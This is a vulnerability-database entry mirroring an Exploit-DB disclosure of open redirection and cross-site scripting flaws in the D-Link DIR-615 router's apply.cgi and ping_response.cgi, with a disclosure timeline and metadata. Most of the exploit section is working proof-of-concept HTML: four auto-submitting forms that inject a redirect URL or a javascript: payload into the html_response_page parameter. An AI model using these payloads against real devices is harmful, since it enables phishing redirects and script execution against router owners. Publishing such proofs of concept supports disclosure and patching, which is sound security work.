ID
VAR-E-201701-0676
EDB ID
41033
TITLE
D-Link DIR-615 - Multiple Vulnerabilities - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link DIR-615 - Multiple Vulnerabilities.. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | d link | model: | dir-615 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
# Title: D-Link DIR-615 Multiple Vulnerabilities
# Date: 10-01-2017
# Hardware Version: E3
# Firmware Version: 5.10
# Tested on: Windows 8 64-bit
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Original write-up:https://osandamalith.com/2017/01/04/d-link-dir-615-open-redirection-and-xss/
Overview
--------
The 'apply.cgi' file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in 'apply.cgi'. For example the 'ping_response.cgi' file.
Open Redirection
-----------------
# apply.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="https://google.lk" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
# ping_response.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="https://google.lk" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<input type="hidden" name="ping_ipaddr" value="192.168.0.101" />
<input type="hidden" name="ping" value="Ping" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
POST XSS
---------
# apply.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
# ping_response.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<input type="hidden" name="ping_ipaddr" value="127.0.0.1" />
<input type="hidden" name="ping" value="Ping" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
Disclosure Timeline
--------------------
12/19/16: Reported to D-Link
12/21/16: Security Patch released
ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVT/DIR-615_REVT_RELEASE_NOTES_20.12PTb01.pdf
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Multiple Vulnerabilities
Trust: 1.6
CREDITS
Osanda Malith Jayathissa
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 41033 | Trust: 1.6 |
| db: | EDBNET | id: | 89953 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/41033/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 41033 |
| db: | EDBNET | id: | 89953 |
LAST UPDATE DATE
2022-07-27T10:00:43.252000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 41033 | date: | 2017-01-10T00:00:00 |
| db: | EDBNET | id: | 89953 | date: | 2017-01-12T00:00:00 |